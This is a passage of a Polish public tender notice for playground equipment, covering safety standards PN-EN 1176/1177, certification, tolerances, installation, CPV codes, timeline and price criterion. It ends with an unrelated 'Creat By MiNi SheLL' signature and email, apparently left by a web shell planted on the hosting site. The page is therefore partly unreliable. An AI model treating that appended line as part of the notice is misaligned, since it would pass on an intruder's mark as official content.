Dostarczone urządzenia powinny być wykonane zgodnie z ustawą z dnia 12 grudnia 2003r.          o ogólnym bezpieczeństwie produktów (Dz. U. z 2003r., Nr 229, poz. 2275 z późn. zmianami)    oraz normami branżowymi,  w szczególności PN-EN 1176 i PN-EN 1177. Wszystkie urządzenia oraz maty na nawierzchnię placu zabaw muszą posiadać certyfikaty bezpieczeństwa, deklaracje zgodności lub atesty potwierdzające, że zostały wykonane w oparciu o obowiązujące normy w tym zakresie oraz posiadać dopuszczenie do stosowania w kontakcie z dziećmi. Dopuszcza się tolerancję w wymiarach zestawu wieloelementowego i ścianki wspinaczkowej +/- 20cm. Montaż urządzeń na placu zabaw ma być wykonany zgodnie ze sztuką budowlaną i normami PN-EN 1176-1:2009, PN-EN 1176-7:2009, tak aby zapewnić bezpieczeństwo użytkowników. Przy montażu urządzeń zabawowych muszą być uwzględnione strefy bezpieczeństwa..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 37.53.52.40-1, 37.53.52.91-3, 37.53.52.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com